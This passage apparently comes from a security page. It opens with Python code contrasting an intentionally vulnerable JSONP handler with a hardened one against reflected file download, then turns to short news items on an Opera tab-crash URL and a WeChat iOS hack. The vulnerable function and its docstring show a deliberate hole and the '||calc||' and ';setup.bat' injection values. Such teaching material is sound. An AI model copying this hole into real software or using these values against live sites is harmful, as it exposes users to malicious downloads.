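TEXT = {"Content-Type": "text/plain; charset=utf-8"}


def share_count_vulnerable(path, params):
    """The flawed pattern: 'url' is reflected into the JSON body (escaping the
    quote does not help, cmd.exe still sees '||calc||' as a command separator),
    a ';setup.bat' suffix on the path still reaches the handler and becomes the
    download name, and no header pins the filename or content type."""
    if not path.startswith(ROUTE):
        return 404, TEXT, "Not found"
    url = params.get("url", "").replace('"', '\\"')
    callback = params.get("callback", DEFAULT_CALLBACK)
    body = '%s({"count":0,"fCnt":"0","fCntPlusOne":"1","url":"%s"});' % (callback, url)
    return 200, {"Content-Type": "application/javascript"}, body


def share_count_hardened(path, params):
    """Closes each RFD ingredient: exact route match (no path-parameter filename),
    allowlisted callback name, validated URL, proper JSON serialisation, a
    server-chosen filename via Content-Disposition, and nosniff so the body is
    never reinterpreted as something else."""
    if path != ROUTE:
        return 404, TEXT, "Not found"
    callback = params.get("callback", DEFAULT_CALLBACK)
    if not CALLBACK_RE.match(callback):
        return 400, TEXT, "Invalid callback"
    url = params.get("url", "")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return 400, TEXT, "Invalid url"
    payload = {"count": 0, "fCnt": "0", "fCntPlusOne": "1", "url": url}
    body = "%s(%s);" % (callback, json.dumps(payload))
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        # A navigation to this URL now saves 'share-count.json', never 'setup.bat';
        # <script src> consumers of the JSONP ignore Content-Disposition.
        "Content-Disposition": 'attachment; filename="share-count.json"',
    }
    return 200, headers, body
```

Of the four fixes, the fixed Content-Disposition filename is the one that kills RFD on its own (the browser can no longer be talked into a .bat name), and the strict callback check is what stops the reflected body from ever starting with attacker-chosen text; URL validation and nosniff are defence in depth. In Shopify's case the same reasoning applies to the signup_page parameter and the track.bat path suffix.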

Crash an "Opera" Browser Tab by Pointing the Cursor at a Simple URL String

Andris Atteka, a security researcher, was able to crash the Chrome browser with a simple URL string, given below:



The Opera browser is affected by the same bug, but in Opera only the particular tab crashes when the user points the cursor at the URL, rather than the whole browser. The issue is limited to the desktop version of Opera. When the user hovers over the URL, the error shown in the image below is displayed:

The researcher added a null character to the URL string to crash Google Chrome, and reported the crash to Google (Chromium issue #533361).

In reply, the Chrome team said that this crash is a denial-of-service bug and not a security flaw.

The mobile version of Chrome is also affected by the bug.

WeChat v6.2.5 for iOS Hacked; Everything Safe and Under Control, Says Tencent

China’s leading messaging application WeChat, which has some 600 million users, has reportedly been hacked. Tencent addressed the issue on Friday, saying the app was attacked through a vulnerability that has already been patched.

The company has opened an investigation, and it appears that no user data was compromised and no virtual cash held in Tenpay e-wallets was stolen.

The vulnerability affects only iOS devices running WeChat version 6.2.5.

As per Tencent’s blog post,



A security flaw, caused by an external malware, was recently discovered affecting iOS users only on WeChat version 6.2.5. This flaw has been repaired and will not affect users who install or upgrade WeChat version 6.2.6 or greater, currently available on the iOS App Store. 


Here are some important points about the situation.
  1. The flaw, described in recent media reports, only affects WeChat v6.2.5 for iOS. Newer versions of WeChat (versions 6.2.6 or greater) are not affected.
  2. A preliminary investigation into the flaw has revealed that there has been no theft and leakage of users’ information or money, but the WeChat team will continue to closely monitor the situation.
  3. The WeChat tech team has extensive experience combating attempts to hack our systems. Once the security flaw was discovered, the team immediately took steps to secure against any theft of user information.
  4. Users who encounter any issues can contact the team by leaving feedback in the “WeChat Team” WeChat account.

This is not the first incident of its kind. At the end of last month, British police warned users of a scam on WeChat that tried to trick unwary users into buying gift cards or online shopping credit in exchange for offline sexual services.


Similarly, a CNBC report last month stated that various mobile messaging applications, including WeChat, were being used for malicious purposes and could be allowing hackers to “steal sensitive information and send it back to a remote server.”
The past few months have seen a noticeable increase in the number of attacks on online websites and apps.
